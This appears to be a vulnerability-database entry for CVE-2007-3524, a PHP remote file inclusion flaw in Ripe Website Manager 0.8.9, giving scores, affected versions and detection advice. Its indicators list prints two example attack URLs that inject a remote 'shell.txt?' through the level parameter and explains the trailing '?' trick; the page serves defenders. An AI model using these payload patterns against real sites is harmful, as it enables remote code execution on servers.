cbcvebase.
CVE-2007-3524
published 2007-07-03

CVE-2007-3524: Multiple PHP remote file inclusion vulnerabilities in Ripe Website Manager 0.8.9 and earlier allow remote attackers to execute arbitrary PHP code via a URL in…

PriorityP351medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
64.20%
99.1th percentile
Multiple PHP remote file inclusion vulnerabilities in Ripe Website Manager 0.8.9 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the level parameter to (1) admin/includes/author_panel_header.php or (2) admin/includes/admin_header.php.

Affected

1 ranges
VendorProductVersion rangeFixed in
ripe_website_managerripe_website_manager<= 0.8.9

Detection & IOCsextracted from sources · hover to see the quote

path/admin/includes/author_panel_header.php
path/admin/includes/admin_header.php
urlhttp://www.site.com/[path to ripe]/admin/includes/author_panel_header.php?level=shell.txt?
urlhttp://www.site.com/[path to ripe]/admin/includes/admin_header.php?level=shell.txt?
  • Monitor HTTP requests targeting the `level` parameter in the two vulnerable PHP scripts for values containing a URL (remote file inclusion pattern), particularly those ending with `?` to nullify the appended extension.
  • The RFI payload appends a trailing `?` to the injected URL (e.g., `level=shell.txt?`) to neutralise any suffix appended by the include statement — look for this pattern in web server logs.
  • ·Vulnerability affects Ripe Website Manager version 0.8.9 and earlier only; verify the installed version before applying detection rules to avoid false positives on patched installations.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.